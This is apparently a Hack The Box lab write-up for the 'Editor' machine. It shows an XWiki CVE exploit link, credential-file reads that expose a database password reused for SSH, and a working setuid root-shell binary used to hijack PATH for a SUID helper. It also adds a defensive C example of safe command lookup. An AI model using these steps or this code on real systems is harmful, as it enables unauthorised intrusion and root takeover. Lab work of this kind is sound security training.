Editor-htb

Port scan, then go in through port 8080

┌──(root㉿kali)-[~]
└─# nmap 10.10.11.80
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-02 12:19 CST
Nmap scan report for editor.htb (10.10.11.80)
Host is up (1.3s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

It turns out to be an XWiki instance, so hit it with a PoC:

hackersonsteroids/cve-2025-24893: Modified exploit for CVE-2025-24893

Got a shell

Search for the database configuration files:

$ find /var/lib/xwiki/ /etc/xwiki/ /opt/xwiki/ -name "*config*" -o -name "*.properties" -o -name "*.xml" 2>/dev/null
/var/lib/xwiki/data/configuration.properties
/var/lib/xwiki/data/store/file/xwiki/b/f/8fb536bfe96480556241885cb20974/attachments/e/6/d4cbb35779b27121c39efde2a23520/~METADATA.xml
/var/lib/xwiki/data/store/solr/events_9/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/events_9/core.properties
/var/lib/xwiki/data/store/solr/extension_index_9/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/extension_index_9/core.properties
/var/lib/xwiki/data/store/solr/solr.xml
/var/lib/xwiki/data/store/solr/events/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/events/core.properties
/var/lib/xwiki/data/store/solr/search/META-INF/maven/org.xwiki.platform/xwiki-platform-search-solr-server-core/pom.xml
/var/lib/xwiki/data/store/solr/search/META-INF/maven/org.xwiki.platform/xwiki-platform-search-solr-server-core/pom.properties
/var/lib/xwiki/data/store/solr/search/conf/elevate.xml
/var/lib/xwiki/data/store/solr/search/conf/currency.xml
/var/lib/xwiki/data/store/solr/search/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/search/core.properties
/var/lib/xwiki/data/store/solr/search_9/conf/managed-schema.xml
/var/lib/xwiki/data/store/solr/search_9/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/search_9/core.properties
/var/lib/xwiki/data/store/solr/extension_index/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/extension_index/core.properties
/var/lib/xwiki/data/extension/history/2025.06.13.xml
/var/lib/xwiki/data/jobs/status/store.properties
/var/lib/xwiki/data/jobs/status/3/distribution/log.xml
/var/lib/xwiki/data/jobs/status/3/solr/indexer/log.xml
/var/lib/xwiki/data/jobs/status/extension/index/log.xml
/var/lib/xwiki/data/jobs/status/solr/indexer/log.xml
/var/lib/xwiki/tmp/start_1826614924204897555.properties
/etc/xwiki/portlet.xml
/etc/xwiki/jetty-web.xml
/etc/xwiki/jetty-ee8-web.xml
/etc/xwiki/cache/infinispan/config.xml
/etc/xwiki/hibernate.cfg.xml
/etc/xwiki/xwiki.properties
/etc/xwiki/sun-web.xml
/etc/xwiki/web.xml
/etc/xwiki/jboss-deployment-structure.xml
/etc/xwiki/xwiki-tomcat9.xml
/etc/xwiki/version.properties
/etc/xwiki/logback.xml

I asked an AI, which said to look at this file:

$ cat /etc/xwiki/hibernate.cfg.xml

    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
    <property name="hibernate.dbcp.poolPreparedStatements">true</property>
    <property name="hibernate.dbcp.maxOpenPreparedStatements">20</property>

Got the database username and password.

Check /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
Found the user oliver.

The database password can be used to log in here.

Found a SUID program, ndsudo.

When you run nvme-list here, it executes the nvme program, so we hijack it through the environment variable.

#include <unistd.h>

/* Stand-in "nvme" binary: switch to root's IDs, then start a shell. */
int main(void) {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}
Compile it and upload it:
scp nvme oliver@10.10.11.80:/tmp
oliver@10.10.11.80's password:  
nvme 

export PATH=/tmp:$PATH
Privilege escalation succeeded.
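
The escalation above depends on a privileged helper resolving a command name through the caller's PATH. The following is an added example, not code from the original post and not ndsudo's source: a generic lookup in C that puts the PATH-based resolution beside a hardened one searching only a compiled-in directory list. `TRUSTED_DIRS`, `helper-demo` and the function names are assumptions made for illustration, and the planted file is constructed sample input.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#define TRUSTED_DIRS "/usr/sbin:/usr/bin:/sbin:/bin" /* assumed fixed list */

/* Find bare command `name` in a colon-separated dir list; 0 if found. */
static int find_in_dirs(const char *name, const char *dirs, char *out, size_t n)
{
    if (!dirs || !*name || strchr(name, '/')) return -1;
    char *copy = strdup(dirs), *save = NULL;
    int rc = -1;
    if (!copy) return -1;
    for (char *d = strtok_r(copy, ":", &save); d && rc; d = strtok_r(NULL, ":", &save)) {
        struct stat st;
        if (snprintf(out, n, "%s/%s", d, name) >= (int)n) continue;
        if (stat(out, &st) == 0 && S_ISREG(st.st_mode) && access(out, X_OK) == 0)
            rc = 0;
    }
    free(copy);
    return rc;
}

/* Weak: the caller's PATH decides which binary a privileged helper runs. */
int resolve_from_env(const char *name, char *out, size_t n)
{ return find_in_dirs(name, getenv("PATH"), out, n); }

/* Hardened: PATH is ignored; only the compiled-in list is searched. */
int resolve_trusted(const char *name, char *out, size_t n)
{ return find_in_dirs(name, TRUSTED_DIRS, out, n); }

/* Constructed case: writable dir first in PATH; 1 = only PATH lookup fooled. */
int demo(void)
{
    char dir[] = "/tmp/pathdemoXXXXXX", planted[64], a[256], b[256];
    if (!mkdtemp(dir)) return -1;
    snprintf(planted, sizeof planted, "%s/helper-demo", dir);
    FILE *f = fopen(planted, "w");
    if (!f || fclose(f)) return -1;
    chmod(planted, 0755);
    setenv("PATH", dir, 1);
    int env_hit = resolve_from_env("helper-demo", a, sizeof a) == 0 && !strcmp(a, planted);
    int fixed_hit = resolve_trusted("helper-demo", b, sizeof b) == 0;
    unlink(planted); rmdir(dir);
    return env_hit && !fixed_hit;
}

int main(void) { printf("only PATH lookup fooled: %d\n", demo()); return 0; }
```

A privileged helper can also overwrite PATH with the fixed list, or clear the environment, before it executes anything.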

learning

XWiki PoC: https://github.com/hackersonsteroids/cve-2025-24893
find /var/lib/xwiki/ /etc/xwiki/ /opt/xwiki/ -name "*config*" -o -name "*.properties" -o -name "*.xml" 2>/dev/null : search for configuration files
MySQL/MariaDB: /etc/mysql/my.cnf or /etc/my.cnf are the key configuration files
/etc/xwiki/hibernate.cfg.xml : the core database configuration file of the XWiki enterprise wiki platform
export PATH=/tmp:$PATH : puts `/tmp` at the very front of PATH and keeps the existing paths
